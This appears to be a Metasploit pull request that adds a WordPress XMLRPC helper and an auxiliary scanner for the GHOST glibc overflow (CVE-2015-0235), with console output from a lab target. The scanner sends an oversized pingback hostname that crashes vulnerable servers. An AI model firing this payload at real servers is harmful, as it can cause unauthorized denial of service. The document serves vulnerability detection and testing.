### PR TITLE
add wordpress ghost scanner module

### DIFF
--- a/lib/msf/http/wordpress.rb
+++ b/lib/msf/http/wordpress.rb
@@ -11,6 +11,7 @@ module Msf
       require 'msf/http/wordpress/uris'
       require 'msf/http/wordpress/users'
       require 'msf/http/wordpress/version'
+      require 'msf/http/wordpress/xmlrpc'
 
       include Msf::Exploit::Remote::HttpClient
       include Msf::HTTP::Wordpress::Base
@@ -20,6 +21,7 @@ module Msf
       include Msf::HTTP::Wordpress::URIs
       include Msf::HTTP::Wordpress::Users
       include Msf::HTTP::Wordpress::Version
+      include Msf::HTTP::Wordpress::XmlRpc
 
       def initialize(info = {})
         super

--- a/lib/msf/http/wordpress/xmlrpc.rb
+++ b/lib/msf/http/wordpress/xmlrpc.rb
@@ -1,0 +1,40 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::Wordpress::XmlRpc
+
+  # Determines if the XMLRPC interface is enabled by sending a demo.sayHello reuqest
+  #
+  # @return [Boolean] true if the interface is enabled
+  def wordpress_xmlrpc_enabled?
+    xml = wordpress_generate_xml_rpc_body('demo.sayHello')
+
+    res = send_request_cgi(
+    'uri'       => wordpress_url_xmlrpc,
+    'method'    => 'POST',
+    'ctype'     => 'text/xml;charset=UTF-8',
+    'data'      => xml
+    )
+
+    return true if res && res.body =~ /<string>Hello!<\/string>/
+    return false
+  end
+
+  # Extracts the Wordpress version information from various sources
+  #
+  # @param method_name [String] The XMLRPC method to call
+  # @param params [String] The XMLRPC method params
+  # @return [String] xml string
+  def wordpress_generate_xml_rpc_body(method_name, *params)
+    xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
+    xml << "<methodCall>"
+    xml << "<methodName>#{method_name}</methodName>"
+    xml << "<params>"
+    params.each do |p|
+      xml << "<param><value><string>#{p}</string></value></param>"
+    end
+    xml << "</params>"
+    xml << "</methodCall>"
+    return xml
+  end
+
+end

--- a/lib/msf/http/wordpress/xmlrpc.rb
+++ b/lib/msf/http/wordpress/xmlrpc.rb
@@ -2,7 +2,7 @@
 
 module Msf::HTTP::Wordpress::XmlRpc
 
-  # Determines if the XMLRPC interface is enabled by sending a demo.sayHello reuqest
+  # Determines if the XMLRPC interface is enabled by sending a demo.sayHello request
   #
   # @return [Boolean] true if the interface is enabled
   def wordpress_xmlrpc_enabled?
@@ -19,7 +19,7 @@ module Msf::HTTP::Wordpress::XmlRpc
     return false
   end
 
-  # Extracts the Wordpress version information from various sources
+  # Generates the xml post body for a XMLRPC call
   #
   # @param method_name [String] The XMLRPC method to call
   # @param params [String] The XMLRPC method params

--- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
+++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-    'Name' => 'WordPress XMLRPC Ghost vulnerability scanner',
+    'Name' => 'WordPress XMLRPC Ghost Vulnerability Scanner',
     'Description' => %q{
       This module can be used to determine hosts vulnerable to the Ghost vulnerability via
       a call to the WordPress XMLRPC interface. If the target is vulnerable, the system
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
       OptInt.new('COUNT', [false, 'Number of iterations', 2500]),
     ], self.class)
   end
-  
+
   def count
     datastore['COUNT']
   end

--- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
+++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
@@ -39,12 +39,12 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
     [
-      OptInt.new('COUNT', [false, 'Number of iterations', 2500]),
+      OptInt.new('LENGTH', [false, 'Payload length', 2500]),
     ], self.class)
   end
 
-  def count
-    datastore['COUNT']
+  def length
+    datastore['LENGTH']
   end
 
   def generate_pingback_xml(target, valid_blog_post)
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    ghost = "0" * count
+    ghost = "0" * length
     payload = "http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php"
     xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)
 
@@ -76,12 +76,12 @@ class Metasploit3 < Msf::Auxiliary
     if res.nil? || res.code == 500
       print_good("#{peer} - vulnerable to GHOST")
       report_vuln(
-      :host		=> ip,
-      :proto	=> 'tcp',
-      :port		=> datastore['RPORT'],
-      :name		=> self.name,
-      :info		=> "Module #{self.fullname} found GHOST vulnerability",
-      :sname	=> datastore['SSL'] ? "https" : "http"
+      :host   => ip,
+      :proto  => 'tcp',
+      :port   => datastore['RPORT'],
+      :name   => self.name,
+      :info   => "Module #{self.fullname} found GHOST vulnerability",
+      :sname  => datastore['SSL'] ? "https" : "http"
       )
     else
       print_status("#{peer} - target not vulnerable to GHOST")

--- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
+++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+    'Name' => 'WordPress XMLRPC Ghost vulnerability scanner',
+    'Description' => %q{
+      This module can be used to determine hosts vulnerable to the Ghost vulnerability via
+      a call to the WordPress XMLRPC interface. If the target is vulnerable, the system
+      will segfault and return a server error. On patched systems a normal XMLRPC error
+      is returned.
+    },
+    'Author' =>
+    [
+      'Robert Rowley',
+      'Christophe De La Fuente' ,
+      'Chaim Sanders' ,
+      'Felipe Costa' ,
+      'Jonathan Claudius' ,
+      'Karl Sigler' ,
+      'Christian Mehlmauer' # metasploit module
+    ],
+    'License' => MSF_LICENSE,
+    'References'  =>
+    [
+      [ 'CVE', '2015-0235' ],
+      [ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],
+      [ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']
+    ]
+    ))
+
+    register_options(
+    [
+      OptInt.new('COUNT', [false, 'Number of iterations', 2500]),
+    ], self.class)
+  end
+  
+  def count
+    datastore['COUNT']
+  end
+
+  def generate_pingback_xml(target, valid_blog_post)
+    wordpress_generate_xml_rpc_body('pingback.ping', target, valid_blog_post)
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      print_error("#{peer} - Looks like this site is no WordPress blog")
+      return
+    end
+
+    unless wordpress_xmlrpc_enabled?
+      print_error("#{peer} - XMLRPC interface is not enabled")
+      return
+    end
+
+    ghost = "0" * count
+    payload = "http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php"
+    xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)
+
+    res = send_request_cgi(
+    'uri'       => wordpress_url_xmlrpc,
+    'method'    => 'POST',
+    'ctype'     => 'text/xml;charset=UTF-8',
+    'data'      => xml
+    )
+
+    if res.nil? || res.code == 500
+      print_good("#{peer} - vulnerable to GHOST")
+      report_vuln(
+      :host		=> ip,
+      :proto	=> 'tcp',
+      :port		=> datastore['RPORT'],
+      :name		=> self.name,
+      :info		=> "Module #{self.fullname} found GHOST vulnerability",
+      :sname	=> datastore['SSL'] ? "https" : "http"
+      )
+    else
+      print_status("#{peer} - target not vulnerable to GHOST")
+    end
+  end
+
+end

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb
@@ -42,30 +42,9 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('BLANK_PASSWORDS') # we don't need this option
   end
 
-  def xmlrpc_enabled?
-    xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
-    xml << '<methodCall>'
-    xml << '<methodName>demo.sayHello</methodName>'
-    xml << '<params>'
-    xml << '<param></param>'
-    xml << '</params>'
-    xml << '</methodCall>'
-
-    res = send_request_cgi(
-      'uri'       => wordpress_url_xmlrpc,
-      'method'    => 'POST',
-      'data'      => xml
-    )
-
-    if res && res.body =~ /<string>Hello!<\/string>/
-      return true # xmlrpc is enabled
-    end
-    return false
-  end
-
   def run_host(ip)
     print_status("#{peer}:#{wordpress_url_xmlrpc} - Sending Hello...")
-    if xmlrpc_enabled?
+    if wordpress_xmlrpc_enabled?
       vprint_good("XMLRPC enabled, Hello message received!")
     else
       print_error("XMLRPC is not enabled! Aborting")


### PR DESCRIPTION
This adds a simple scanner for the GHOST vulnerability through the WordPress XMLRPC interface

Verification Steps:
- Install Ubuntu 12.04 with LAMP stack
- Install Wordpress
- Run the module
- watch /var/crash on the server for a core dump

```
msf auxiliary(wordpress_ghost_scanner) > show options

Module options (auxiliary/scanner/http/wordpress_ghost_scanner):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LENGTH     2500             no        Payload length
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.211.55.56     yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wordpress_ghost_scanner) > run

[+] 10.211.55.56:80 - vulnerable to GHOST
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

cc @todb-r7 
